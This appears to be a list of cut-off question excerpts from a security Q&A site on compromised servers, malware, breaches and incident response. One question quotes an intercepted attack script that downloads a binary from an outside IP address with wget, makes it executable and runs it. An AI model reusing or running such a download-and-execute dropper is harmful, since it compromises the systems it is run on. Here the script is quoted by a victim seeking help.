I suspect that one or more of my servers is compromised by a hacker, virus, or other mechanism:
What are my first steps? When I arrive on site should I disconnect the server, preserve "evidence", are there other initial considerations?
How do I go…
Yesterday, I was performing a bit of general maintenance on a VPS of mine, using the IPMI console my host provided.
Upon setting up SSH keys again via the IPMI console, I logged in via SSH and was shocked to see this:
Welcome to Ubuntu 14.04.2 LTS…
When a machine has been infected with malware, most of us here immediately identify the appropriate action as "nuke it from orbit" - i.e. wipe the system and start over. Unfortunately, this is often costly for a company, especially if backups are…
Yesterday, Twitter anounced that they recently identified a bug that stored passwords unmasked in an internal log. Recently, Github also had a similar bug. In both cases, they claim that nobody had access to these files.
Twitter:
We have fixed the…
I was using my laptop at a Starbucks on a table, and a person was using a laptop on the same table across from me, a couple seats to my side. He flicked some plastic thing across the table towards my laptop. What really freaked me out was he then…
On this ISC article on DVR compromise the author talks about the compromise of an embedded system. In particular, the attacker executes a series of echo commands on the remote host, and:
This DVR has no "upload" feature. There is no wget nor is…
Since, recently, it has been proven that transferring data through the usb port is fundamentally flawed, I'm wondering if there are 100% secure ways to transfer data without using the Internet.
Suppose Alan has a computer system that has been…
We got an official email saying that our website had been hacked. They cited the URL to use to see the new suspicious file that had been dropped in our web root folder (s.htm). Just some text about a "Morrocan Made hacker - I'm Back" in the HTML…
Can a malware that infected your local computer compromise a KeePass database stored locally in any way?
If yes, what's the point for KeePass to have such strong security mechanisms if it cannot resist to this scenario? If you keep your DB locally,…
Earlier today I received a notification of a security incident at Mandrill. At first I was concerned, but then after I dove into the details I became confused as to why they considered this noteworthy at all.
To summarize, it appears that Mandrill…
I have intercepted an attack on my web server that I believe was unsuccessful. The attacker tried to execute this script:
#!/bin/sh
cd /tmp;cd /dev/shm
wget -q http://221.132.37.26/xx -O ...x
chmod +x ...x
./...x
cd /dev/shm ; wget…
I was discussing with someone ways to prevent data disclosure from a compromised admin account on a database server. The other person proposed encrypting the data at rest within the database. It sounds like a good idea, but I wasn't sure if that…
It was recently disclosed that private information pertaining to over 500 million Yahoo accounts was stolen.
Yahoo's Chief Information Security Officer, Bob Lord, states that the information was stolen from Yahoo's computers by what Yahoo "believes…
My EC2 instance was hacked recently. It doesn't really matter as I'm just starting my website and there was no sensitive information on my server yet, but I do plan for there to be in the future. I am going to terminate the compromised server and…